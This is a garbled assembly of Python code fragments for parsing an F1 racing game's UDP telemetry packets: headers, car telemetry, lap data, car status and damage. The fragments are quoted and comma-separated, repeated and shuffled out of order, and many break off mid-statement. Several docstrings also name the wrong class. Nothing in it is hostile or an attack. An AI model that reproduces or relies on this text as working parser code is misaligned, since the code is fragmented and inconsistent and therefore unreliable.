car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict:", "_telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list", "m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class", "attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") #", "list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod", "class. binary_message (str): Binary representation of struct. \"\"\" # Unpack struct unpacked =", "unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod", "\"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format:", "unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header:", "len(message_format) : (i + 1) * len(message_format) ] ) data_list.append(data) return data_list @dataclass", "\"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy:", "= list() for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format)", "cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index =", "Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap data", "UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct.", "values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\",", "\"fr\"] telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) +", "unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25],", "(str): Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData", "ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct", "binary format and extract player data.\"\"\" import struct import ctypes from dataclasses import", "packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get", "m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls,", "= message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i + 1) * len(message_format) ]", "unpacked[len(asdict(packet_header)) : :] # Get telemetry for each active car car_telemetry_data_list = list()", "class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str):", "ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8", "player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map", "class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message:", "struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list)", "player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ |", "unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index:", "PacketHeader, binary_message: str): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader", "PacketHeader, binary_message: str, message_format: str, message_type: object, ): \"\"\"Create class form binary UDP", "unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23],", "header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap data for", "m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value:", "m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls,", "( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure", "class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class", "List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked:", "player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map", "list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), )", "binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data", "brake temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes(", "struct. \"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list)", "* 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct unpacked_wo_header =", "list, attribute_name: str) -> dict: \"\"\"Get single attributes from attributes list and allocate", "temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"],", "m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into", "list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) )", "list and allocate to position on car (fl, fr, rl, rr). Args: telemetry_values(list):", "@dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader,", "import struct import ctypes from dataclasses import dataclass, asdict from typing import List", "inner temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes(", "= ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres", "get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object, ): \"\"\"Create class", "( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass", "packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader):", "= ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake", "= self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature", "attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4],", "self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float", "m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod", "in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i + 1)", "ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8", "m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature:", "= \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str)", "m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes.", ") car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) ->", "self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map", "list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) :", "def from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP package. Args: binary_message (str):", "m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls,", "m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type:", ") @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player:", "PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" # Unpack struct unpacked", "self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float", "PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header,", "car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self)", "ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create", "@dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16", "player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return", "ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float", "m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod", "packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_damage_data_list =", "PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8", "list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22],", "to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5],", "@dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float", "List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\"", "Get lap data for each active car data_list = list() for i in", "# Map tyres pressure values from list to attributes player_telemetry_message = ( player_telemetry_message", "from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", )", "\"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message =", "player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\"", ") ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list to attributes player_car_damage_message", "message_format: str, message_type: object, ): \"\"\"Create class form binary UDP package. Args: packet_header", "struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) # Remove", "player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ |", "\"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct unpacked_wo_header", "cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]),", "| player_car_damage.__dict__.copy() ) # Map tyre wear values from list to attributes player_car_damage_message", "player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list to", "unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls,", "player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound:", "to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\")", "player_car_damage.__dict__.copy() ) # Map tyre wear values from list to attributes player_car_damage_message =", "car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT)", "be mapped to attributes. attribute_name(str): Attribute name used as keys in dict. \"\"\"", "PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :]", "values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\",", "\"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9],", "packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object, ): \"\"\"Create class form binary", "player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from list to attributes player_telemetry_message =", "= self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear", "list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData", ") ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32", "= cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) ->", "attributes from attributes list and allocate to position on car (fl, fr, rl,", "\"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single attributes from attributes", "binary_message (str): Binary representation of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from(", "player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map", "unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData:", "unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), )", "telemetry values that should be mapped to attributes. attribute_name(str): Attribute name used as", "m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index:", ": :] # Get telemetry for each active car car_telemetry_data_list = list() for", "representation of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format", "m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs:", "return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get", "def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object, ): \"\"\"Create", "binary_message (str): Binary representation of package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked =", "data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer:", "car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16", "to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\")", "List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP", "struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, )", "unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24],", "car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index", "= \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single attributes from", "ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP", "PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) # Remove header from struct unpacked_wo_header", "\"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def", "unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\"", "dataclasses import dataclass, asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT =", "= unpacked[len(asdict(packet_header)) : :] # Get lap data for each active car data_list", "data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy()", "list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) )", "return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float", "CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked:", "Map tyres pressure values from list to attributes player_telemetry_message = ( player_telemetry_message |", "list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data:", "ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def", "# Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT,", "\"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message,", "unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\"", "ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16", "from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry for each active", "to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\", ) ) player_car_damage_message.pop(\"m_brakesDamage\")", "(PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list(", "= ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from list", "unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class", "i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return", "m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent:", "return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8", "player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear values from", "ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float", "unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def", "return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index", "containing all attributes to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2],", ") player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS:", "@dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message:", "telemetry. Classes parse data from binary format and extract player data.\"\"\" import struct", "telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value", "dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message", "telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version:", "List of telemetry values that should be mapped to attributes. attribute_name(str): Attribute name", ") data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float", "construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6],", "( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage", "struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1],", "in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for", "for i in range(22): car_telemetry_data = 